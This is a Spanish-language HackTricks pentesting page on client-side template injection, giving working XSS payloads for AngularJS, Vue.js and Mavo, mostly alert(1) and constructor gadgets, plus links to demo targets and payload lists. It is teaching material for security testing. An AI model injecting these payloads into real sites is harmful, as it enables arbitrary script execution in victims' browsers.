hacktricks/pentesting-web/client-side-template-injection-csti.md

6.9 KiB

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Resumen

Es como una Inyección de Plantillas en el Lado del Servidor pero en el cliente. Mientras que el SSTI puede permitirte ejecutar código en el servidor remoto, el CSTI podría permitirte ejecutar código JavaScript arbitrario en la víctima.

La forma de probar esta vulnerabilidad es muy similar al caso de SSTI, el intérprete esperará algo para ejecutar entre llaves dobles y lo ejecutará. Por ejemplo, usando algo como: {{ 7-7 }} si el servidor es vulnerable verás un 0 y si no, verás el original: {{ 7-7 }}

AngularJS

AngularJS es un marco de JavaScript ampliamente utilizado que interactúa con HTML a través de atributos conocidos como directivas, siendo una notable ng-app. Esta directiva permite a AngularJS procesar el contenido HTML, lo que habilita la ejecución de expresiones JavaScript dentro de llaves dobles.

En escenarios donde la entrada del usuario se inserta dinámicamente en el cuerpo HTML etiquetado con ng-app, es posible ejecutar código JavaScript arbitrario. Esto se puede lograr aprovechando la sintaxis de AngularJS dentro de la entrada. A continuación se muestran ejemplos que demuestran cómo se puede ejecutar código JavaScript:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

Puedes encontrar un ejemplo en línea muy básico de la vulnerabilidad en AngularJS en http://jsfiddle.net/2zs2yv7o/ y en Burp Suite Academy

{% hint style="danger" %} Angular 1.6 eliminó el sandbox por lo que a partir de esta versión un payload como {{constructor.constructor('alert(1)')()}} o <input ng-focus=$event.view.alert('XSS')> debería funcionar. {% endhint %}

VueJS

Puedes encontrar una implementación de vue.js vulnerable en https://vue-client-side-template-injection-example.azu.now.sh/
Payload funcional: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%

Y el código fuente del ejemplo vulnerable aquí: https://github.com/azu/vue-client-side-template-injection-example

<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

Un excelente artículo sobre CSTI en VUE se puede encontrar en https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets

V3

{{_openBlock.constructor('alert(1)')()}}

Crédito: Gareth Heyes, Lewis Ardern & PwnFunction

V2

{{constructor.constructor('alert(1)')()}}

Crédito: Mario Heiderich

Ver más payloads de VUE en https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected

Mavo

Payload:

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

Más payloads en https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations

Lista de Detección de Fuerza Bruta

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: